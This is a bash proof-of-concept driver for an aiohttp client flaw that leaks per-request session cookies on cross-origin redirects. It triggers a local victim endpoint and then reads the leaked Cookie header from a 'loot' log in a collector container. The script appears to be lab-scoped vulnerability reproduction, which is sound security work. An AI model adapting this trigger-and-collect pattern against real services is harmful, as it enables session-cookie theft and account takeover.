#!/usr/bin/env bash
# PoC driver for GHSA-hg6j-4rv6-33pg / CVE-2026-47265.
#
# Drives the victim aiohttp 3.13.5 client to issue its first-hop request with a
# per-request cookie (cookies={"session": <secret>}). The first-hop replies with
# a 302 cross-origin redirect to the collector; the vulnerable client re-attaches
# the per-request cookie to the foreign origin, which records the inbound Cookie
# header. The exploit only fires the trigger and reads the foreign origin's
# record — it never supplies, injects, or echoes the secret itself.
#
# Args:
#   $1  victim trigger URL   (e.g. http://127.0.0.1:9000/trigger)
#   $2  collector container   (e.g. cve-2026-47265-collector)
#   $3  collector loot path    (e.g. /loot/cookie_header.log)
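set -euo pipefail

# All three operands are required. Checking the count up front prints a usage
# line instead of the bare "unbound variable" abort that `set -u` gives when
# $1..$3 are missing. Extra operands are ignored, as before.
if (( $# < 3 )); then
  printf 'usage: %s <trigger-url> <collector-container> <loot-path>\n' \
    "${0##*/}" >&2
  exit 2
fi

readonly TRIGGER_URL="$1"
readonly COLLECTOR_CONTAINER="$2"
readonly LOOT_PATH="$3"

echo "[*] Triggering victim first-hop request -> cross-origin redirect"
# curl runs without -L, so this driver only contacts the trigger endpoint and
# never follows a redirect or sends anything to the collector itself.
# `--` stops option parsing so a URL beginning with '-' is not read as a flag.
trigger_status=0
curl -fsS -- "$TRIGGER_URL" || trigger_status=$?
if (( trigger_status != 0 )); then
  # Without a successful trigger, whatever the collector holds is not a result
  # of this run; stop here rather than print a stale or missing record.
  printf '[!] trigger request failed (curl exit %d); collector record not read\n' \
    "$trigger_status" >&2
  exit "$trigger_status"
fi
echo
echo "[*] Trigger returned; reading foreign-origin (collector) Cookie-header record"

# Small settle so the redirected request lands before we read the record.
# NOTE(review): one second is a fixed guess; on a slow host a read that comes
# back empty may be a timing miss rather than a negative result.
sleep 1

echo "=== collector inbound Cookie header(s) (cross-origin observation point) ==="
# The record is printed verbatim, so stdout carries whatever Cookie value the
# collector logged (the per-request session value in the vulnerable case).
# Handle saved output of this run like the secret itself.
read_status=0
docker exec "$COLLECTOR_CONTAINER" cat -- "$LOOT_PATH" || read_status=$?
if (( read_status != 0 )); then
  # A failed read says nothing about the client under test: the file may not
  # exist yet or the container may not be running. Report it as an error
  # instead of letting `set -e` end the run mid-banner.
  printf '[!] could not read %s in container %s (exit %d)\n' \
    "$LOOT_PATH" "$COLLECTOR_CONTAINER" "$read_status" >&2
  exit "$read_status"
fi
echo "=== end ==="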
